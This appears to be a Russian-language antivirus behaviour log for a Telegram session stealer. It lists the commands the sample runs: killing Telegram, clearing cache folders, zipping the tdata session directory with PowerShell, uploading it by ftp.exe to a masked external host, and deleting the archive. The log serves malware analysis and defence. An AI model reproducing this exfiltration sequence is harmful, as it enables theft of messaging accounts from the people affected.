Техническая информация
- '<SYSTEM32>\taskkill.exe' /IM "telegram.exe" /F
- %TEMP%\2d9a.tmp\2d9b.bat
- %APPDATA%\telegram desktop\tdata\temp.txt
- %APPDATA%\telegram desktop\tdata\temp.txt
- %TEMP%\2d9a.tmp\2d9b.bat
- 'ft###load.net':21
- DNS ASK ft###load.net
- ClassName: '' WindowName: ''
- '<SYSTEM32>\cmd.exe' /c "%TEMP%\2D9A.tmp\2D9B.bat <Полный путь к файлу>"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -window hidden -command ""
- '<SYSTEM32>\cmd.exe' /S /D /c" echo y"
- '<SYSTEM32>\cmd.exe' /S /D /c" rmdir /S dumps"
- '<SYSTEM32>\cmd.exe' /S /D /c" rmdir /S user_data"
- '<SYSTEM32>\cmd.exe' /S /D /c" rmdir /S emoji"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Compress-Archive * 25612.zip
- '<SYSTEM32>\ftp.exe' -s:temp.txt
- '<SYSTEM32>\cmd.exe' /S /D /c" del 25612.zip"